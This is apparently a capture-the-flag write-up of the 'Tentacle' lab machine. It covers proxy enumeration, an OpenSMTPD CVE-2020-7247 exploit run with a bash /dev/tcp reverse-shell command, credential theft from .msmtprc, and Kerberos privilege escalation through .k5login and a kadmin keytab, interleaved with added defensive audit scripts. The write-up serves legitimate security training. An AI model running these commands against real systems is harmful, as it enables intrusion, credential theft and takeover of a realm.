In this post, I would like to share a walkthrough of the Tentacle machine.
This machine is rated as Hard.
Information Gathering on Tentacle
Once the VPN connection is up, we can start gathering information on the machine by running nmap -sC -sV <IP Address> -Pn
We need to add the machine's domain name, REALCORP.HTB, to our hosts file.
Let's open the browser and go straight to the website.
Let's enumerate the website further with gobuster dns -d <domain> -w /SecLists/Discovery/DNS/subdomains-top1million-11000.txt
No results were returned here.
Let's try a different method to find the machine's subdomains by running dnsenum --threads 64 --dnsserver 10.10.10.224 --file /SecLists/Discovery/DNS/subdomains-top1million-11000.txt realcorp.htb
The domains found are listed below:
ns.realcorp.htb 10.197.243.77
proxy.realcorp.htb. ns.realcorp.htb (alias for ns.realcorp.htb)
wpad.realcorp.htb 10.197.243.31
Let's open one of these subdomains in the browser.
The website returns a 403 Forbidden error, so there is nothing useful here.
However, the wpad subdomain caught my attention. Let's do some research on it.
I found that WPAD is short for Web Proxy Auto-Discovery Protocol; you can read more about WPAD here
Thinking about it further, I remembered a tool called proxychains that can help enumerate the machine through the proxy.
Gaining Access to Tentacle machine
For those unfamiliar with proxychains, you can read more about the tool here
We need to install proxychains4 by running sudo apt-get install proxychains4. In my case, the tool was already installed.
We can confirm that proxychains4 is installed by running proxychains4, as shown in the screenshot above.
We need to configure /etc/proxychains4.conf with the proxy IP that we found with dnsenum, at the bottom of the file:
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
Enumerating with proxychains on the machine
Let's rerun the Nmap scan through proxychains4 against the Tentacle machine. The result is the same as before, except that a new open port appears: 80/tcp open http
The wpad.realcorp.htb website still shows a 403 Forbidden error.
For this enumeration process, we will use dirsearch.py; the tool's purpose is described as follows:
"dirsearch" is a mature command-line tool designed to brute force directories and files in webservers.
From the output, /wpad.dat is the only file found during enumeration. Let's open wpad.realcorp.htb/wpad.dat to see what is stored in the file.
A pop-up asks whether we want to save the file to our machine.
When we open wpad.dat, we notice that IP addresses and domain names are stored in the file in script form.
We need to find other IP addresses besides the ones we already know. After a while, we find another IP address: 10.241.251.113
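A wpad.dat file is a proxy auto-config (PAC) script: JavaScript whose FindProxyForURL() routes each request by testing the host against internal subnets (isInNet), internal DNS suffixes (dnsDomainIs, shExpMatch) and then naming a proxy ("PROXY host:port"). Anyone who can fetch the file learns all of that, which is how a second internal network turned up above. The script below is an added example, not code from this write-up or from the machine: it extracts the networks, domain patterns and proxy endpoints a PAC file names, using regular expressions rather than executing the JavaScript, so an administrator can review what a PAC discloses before publishing it. SAMPLE_PAC is constructed for the example (the corp.local suffix is invented) and is not the file from the box.

```python
"""Report what a proxy auto-config (PAC / wpad.dat) file discloses.

Added example. Pure text extraction: the JavaScript is never executed.
"""
import re
from typing import Dict, List

# Constructed sample modelled on common PAC idioms; not the file from the machine.
SAMPLE_PAC = r'''
function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(host, "10.197.243.0", "255.255.255.0") ||
        isInNet(host, "10.241.251.0", "255.255.255.0"))
        return "DIRECT";
    if (shExpMatch(host, "*.corp.local"))
        return "PROXY proxy.realcorp.htb:3128";
    return "PROXY proxy.realcorp.htb:3128; DIRECT";
}
'''

_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# isInNet(host, "<network>", "<netmask>")
_ISINNET = re.compile(r'isInNet\(\s*\w+\s*,\s*"(' + _IPV4 + r')"\s*,\s*"(' + _IPV4 + r')"\s*\)')
# dnsDomainIs(host, "<suffix>") / shExpMatch(host, "<glob>")
_DOMAIN = re.compile(r'(?:dnsDomainIs|shExpMatch)\(\s*\w+\s*,\s*"([^"]+)"\s*\)')
# Each return string may chain several "TYPE host:port" choices separated by ';'.
_RETURN = re.compile(r'return\s+"([^"]+)"')
_PROXY = re.compile(r'(?:PROXY|HTTPS|SOCKS5?|SOCKS4)\s+([^;\s]+)')


def mask_to_prefix(mask: str) -> int:
    """'255.255.255.0' -> 24 (counts set bits; assumes a contiguous mask)."""
    return sum(bin(int(octet)).count("1") for octet in mask.split("."))


def disclosed_by_pac(pac: str) -> Dict[str, List[str]]:
    """Networks, DNS patterns and proxy endpoints named anywhere in the PAC text."""
    networks = sorted({f"{net}/{mask_to_prefix(mask)}" for net, mask in _ISINNET.findall(pac)})
    domains = sorted(set(_DOMAIN.findall(pac)))
    proxies = set()
    for ret in _RETURN.findall(pac):
        proxies.update(_PROXY.findall(ret))
    return {"networks": networks, "domains": domains, "proxies": sorted(proxies)}


if __name__ == "__main__":
    for kind, values in disclosed_by_pac(SAMPLE_PAC).items():
        print(f"{kind}:")
        for value in values:
            print(f"  {value}")
```

Run against a real file with disclosed_by_pac(open("wpad.dat").read()); every network or hostname it prints is visible to every client that can reach the WPAD host, so the list is what an internal-only PAC should be checked against.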
I did some enumeration on that IP address and found that port 25 is open on 10.241.251.113
We must start an nc listener on our machine to catch the reverse shell connection.
We notice that port 25 is running OpenSMTPD, so let's do some research on it.
I found that there is a public exploit for OpenSMTPD.
Trying to exploit using CVE-2020-7247
There are many usable exploits available, but I will use this one to proceed. We can download it to our machine by running git clone https://github.com/FiroSolutions/cve-2020-7247-exploit
After studying the exploit, we need to modify the code so that it works as we planned.
We can run the exploit with a command such as the following:
proxychains -f /etc/proxychains.conf python3 getshell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/<VPN's IP Address>/<PORT> <&1"'
When we check our reverse shell terminal, we have a shell.
We find that we are in as root@smtp, which looks suspicious because it is too early to have root.
Let's look at the /root/ directory; nothing is stored there.
Maintaining Access to the Tentacle machine
We can go to the /home/j.nakazawa directory, where a file named .msmtprc catches my attention.
We can open .msmtprc by running cat .msmtprc
Oh wow! We got credentials: the user and password shown above.
Let's try to access the machine with j.nakazawa's credentials over SSH; unfortunately, we cannot log in that way.
Based on the password found in /home/j.nakazawa/.msmtprc, I notice that the password is stored in Kerberos form.
Playing with the Kerberos tool on the machine
In my research, I found that the Kerberos client tools are provided by krb5, which we need to install on our machine.
We can install them with sudo apt-get install krb5-user
Once installed, we need to modify /etc/krb5.conf by adding the following (under the [libdefaults] and [realms] sections):
[libdefaults]
    default_realm = REALCORP.HTB
[realms]
    REALCORP.HTB = {
        kdc = 10.10.10.224
    }
We also need to add the following to /etc/hosts:
10.10.10.224 realcorp.htb
10.10.10.224 srv01.realcorp.htb
Honestly, I had no idea how to create a Kerberos ticket, so let's do some further research.
We learned how to create a Kerberos ticket from this website
Exploiting with kinit and klist function on the machine
We need to create the ticket with kinit j.nakazawa, using the password found earlier
We can see the ticket by running klist
Let's try to access the machine via ssh j.nakazawa@realcorp.htb
Sadly, we still cannot access the machine with the password found earlier.
Let's troubleshoot by running ssh with -v; the log shows the error Server krbtgt/HTB@REALCORP.HTB not found in Kerberos database
I banged my head multiple times and was stuck on this issue for around 12 hours.
After 12 hours stuck on the issue, I decided to use the entry 10.10.10.224 srv01.realcorp.htb in /etc/hosts.
Next, we recreate the ticket with kinit j.nakazawa and the password found earlier, and check it with klist.
Let's try again to access the machine via ssh j.nakazawa@10.10.10.224, and we finally have access. The earlier error is a host-to-realm mapping problem: with no [domain_realm] entry, the Kerberos library maps a host to the realm named by its uppercased parent domain, so the host realcorp.htb maps to a realm HTB and SSH asks for a cross-realm ticket krbtgt/HTB@REALCORP.HTB that does not exist, whereas srv01.realcorp.htb maps to REALCORP.HTB.
We can read the user flag by going to the /home/j.nakazawa directory and running cat user.txt
Escalate to Root Privileges Access on Tentacle machine
Normally, there is something interesting in the /opt/ directory.
Let's go to the /etc/ directory and look for anything that could help us escalate privileges.
We find a file called crontab. For those unfamiliar with Linux, crontab is a table of tasks scheduled to run at regular intervals on the system.
Let's open the crontab file; at the bottom there is an entry that runs /usr/local/bin/log_backup.sh
We can read log_backup.sh in the /usr/local/bin/ directory. While reading the bash script, I notice that everything stored in /var/log/squid is copied to /home/admin
Let's create a file containing the user's principal (j.nakazawa@realcorp.htb) and save it as .k5login.
When I try to list the file, I get a permission denied error.
Let's run the same command in /home/j.nakazawa, where the file is created successfully.
So, let's copy .k5login into /var/log/squid
Let's try to ssh as admin to srv01.realcorp.htb, and it works like a charm!
We look at what is stored here and find two squid log files in this directory.
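The step above works because ~/.k5login lists the Kerberos principals allowed to become that account, so a .k5login in /home/admin that names j.nakazawa@REALCORP.HTB lets j.nakazawa log in as admin, and a cron job that copies a user-writable directory into a home directory is enough to plant one. The script below is an added example, not part of this write-up or of the machine: it walks a /home-style tree and reports .k5login lines that delegate an account to a different user, plus files that are writable by others or not owned by the account, which is what a defender would want to alert on. The tree it runs on is constructed in a temporary directory (users admin, j.nakazawa and svc_backup are constructed for the example); real use would pass Path("/home").

```python
"""Find .k5login files that grant an account to a different Kerberos principal.

Added example. A line "j.nakazawa@REALCORP.HTB" in /home/admin/.k5login lets
j.nakazawa log in as admin; this audit reports every such delegation.
"""
import stat
import tempfile
from pathlib import Path
from typing import List


def principal_user(principal: str) -> str:
    """Username part of a principal: 'j.nakazawa@REALCORP.HTB' -> 'j.nakazawa',
    'admin/admin@REALCORP.HTB' -> 'admin'."""
    return principal.split("@", 1)[0].split("/", 1)[0]


def audit_k5login(home_root: Path) -> List[str]:
    """Return one finding per suspicious line or file attribute under home_root."""
    findings = []
    for home in sorted(p for p in home_root.iterdir() if p.is_dir()):
        k5 = home / ".k5login"
        if not k5.is_file():
            continue
        user = home.name
        st = k5.stat()
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{user}: .k5login is group/world writable")
        if st.st_uid != home.stat().st_uid:
            findings.append(f"{user}: .k5login owner differs from home directory owner")
        for raw in k5.read_text().splitlines():
            principal = raw.strip()
            if not principal or principal.startswith("#"):
                continue
            # A principal whose user part is not the account itself delegates the
            # account to someone else; that is the admin <- j.nakazawa case above.
            # (A file copied in by a cron job running as the account passes the
            # owner check, so this line check is the one that matters there.)
            if principal_user(principal).lower() != user.lower():
                findings.append(f"{user}: {principal} may log in as {user}")
    return findings


def build_sample_tree() -> Path:
    """Constructed /home lookalike: admin's .k5login names j.nakazawa (the
    write-up's escalation), j.nakazawa's names only itself, svc_backup's is
    world-writable."""
    root = Path(tempfile.mkdtemp(prefix="k5login-audit-"))
    files = {
        "admin": "j.nakazawa@REALCORP.HTB\n",
        "j.nakazawa": "j.nakazawa@REALCORP.HTB\n",
        "svc_backup": "# comment line\nsvc_backup@REALCORP.HTB\n",
    }
    for user, content in files.items():
        home = root / user
        home.mkdir()
        (home / ".k5login").write_text(content)
    (root / "svc_backup" / ".k5login").chmod(0o666)
    return root


if __name__ == "__main__":
    for line in audit_k5login(build_sample_tree()):
        print(line)
```

The mitigation the findings point at is the same in each case: .k5login files should be owned by the account, not writable by anyone else, and should not be reachable by any job that copies files a less privileged user can create.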
Playing with the klist command
We continue our research with the klist command, which is described here
Let's see the principals stored in /etc/krb5.keytab with the command klist -k /etc/krb5.keytab
Some research on the kadmin command can be found here
We can create a new principal by running the following commands:
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB
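What makes the kadmin step possible is that the host keytab holds a key for kadmin/admin@REALCORP.HTB: a keytab entry for an administrative principal lets anyone who can read the file administer the realm, which is why a host keytab should contain only host/ and service keys. The parser below is an added example, not code from this write-up or from MIT krb5: it decodes the MIT keytab binary format (version 0x0502) directly, lists each entry's principal, key version number and encryption type without ever printing key material, and flags administrative principals and weak encryption types. The keytab bytes are constructed inside the script by build_keytab (the key bytes and timestamp are dummy values), so it runs without a KDC; on a real host, pass the contents of /etc/krb5.keytab to parse_keytab.

```python
"""Audit the principals in an MIT Kerberos keytab without using klist.

Added example. Assumes the MIT keytab file format (version 0x0502):
  uint16 version, then entries of
  int32 size | uint16 num_components | realm | components[] | uint32 name_type
  | uint32 timestamp | uint8 vno8 | uint16 enctype | key | [uint32 vno]
Integers are big-endian; realm, components and key are uint16-length-prefixed.
A negative size marks a deleted slot of that many bytes.
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

KEYTAB_VERSION = 0x0502
ENCTYPE_NAMES = {1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
                 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
                 23: "rc4-hmac"}
WEAK_ENCTYPES = {1, 3, 16, 23}          # single-DES, 3DES and RC4


@dataclass
class KeytabEntry:
    principal: str   # e.g. "host/srv01.realcorp.htb@REALCORP.HTB"
    kvno: int
    enctype: int
    timestamp: int


def _counted(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Read a uint16-length-prefixed byte string; return (data, new position)."""
    (length,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    return buf[pos:pos + length], pos + length


def parse_keytab(data: bytes) -> List[KeytabEntry]:
    """Decode every live entry; key bytes are read past and discarded."""
    if len(data) < 2 or struct.unpack_from(">H", data, 0)[0] != KEYTAB_VERSION:
        raise ValueError("not a version 0x0502 keytab")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:                       # deleted slot: skip its bytes
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", data, pos)
        pos += 2
        realm, pos = _counted(data, pos)
        comps = []
        for _ in range(ncomp):
            comp, pos = _counted(data, pos)
            comps.append(comp.decode())
        _name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, pos)
        pos += 9
        (enctype,) = struct.unpack_from(">H", data, pos)
        pos += 2
        _key, pos = _counted(data, pos)    # secret material; never log or print it
        kvno = vno8
        if end - pos >= 4:                 # 32-bit kvno, if present and non-zero, wins
            (vno32,) = struct.unpack_from(">I", data, pos)
            kvno = vno32 or vno8
        pos = end
        entries.append(KeytabEntry(f"{'/'.join(comps)}@{realm.decode()}", kvno, enctype, timestamp))
    return entries


def audit_keytab(entries: List[KeytabEntry]) -> List[str]:
    """Flag what a reviewer of a host keytab should question."""
    findings = []
    for e in entries:
        service = e.principal.split("@", 1)[0]
        if service.startswith("kadmin/"):
            findings.append(f"{e.principal}: administrative principal in a host keytab")
        if e.enctype in WEAK_ENCTYPES:
            findings.append(f"{e.principal}: weak enctype {ENCTYPE_NAMES.get(e.enctype, e.enctype)}")
    return findings


def build_keytab(entries: List[Tuple[str, int, int, bytes]]) -> bytes:
    """Serialise (principal, kvno, enctype, key) tuples in the same layout.
    Used only to construct the sample; the timestamp is a fixed dummy value."""
    out = struct.pack(">H", KEYTAB_VERSION)
    for principal, kvno, enctype, key in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps)) + struct.pack(">H", len(realm)) + realm.encode()
        for comp in comps:
            body += struct.pack(">H", len(comp)) + comp.encode()
        body += struct.pack(">IIB", 1, 1612137600, kvno & 0xFF)   # NT-PRINCIPAL, time, vno8
        body += struct.pack(">H", enctype) + struct.pack(">H", len(key)) + key
        body += struct.pack(">I", kvno)
        out += struct.pack(">i", len(body)) + body
    return out


# Constructed sample: a host key plus a kadmin/admin key, with a deleted slot
# between them to exercise the negative-size path. Key bytes are dummy values.
_DELETED_SLOT = struct.pack(">i", -6) + b"\x00" * 6
SAMPLE_KEYTAB = (build_keytab([("host/srv01.realcorp.htb@REALCORP.HTB", 2, 18, bytes(range(32)))])
                 + _DELETED_SLOT
                 + build_keytab([("kadmin/admin@REALCORP.HTB", 1, 23, bytes(16))])[2:])

if __name__ == "__main__":
    parsed = parse_keytab(SAMPLE_KEYTAB)
    for entry in parsed:
        print(f"{entry.kvno:>3} {entry.principal} ({ENCTYPE_NAMES.get(entry.enctype, entry.enctype)})")
    for finding in audit_keytab(parsed):
        print("FINDING:", finding)
```

Only parse_keytab and audit_keytab are needed against a real file; build_keytab exists so the sample is self-contained. A kadmin/ entry in a keytab that is readable by a non-root user, or by any service account on the host, should be treated as a realm compromise and the key rotated.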
How to escalate to root from here?
We will learn about the ksu command, which you can read about here
From the article I read, we need to run ksu root to escalate to root privileges. We are asked for a password, which is the one we set earlier for the principal with the kadmin command.
We can read the root flag by going to the /root/ directory and running cat root.txt
-THE END-
Happy Learning Guys!
Extra Information
The root hash from /etc/shadow is used as the password to read this write-up.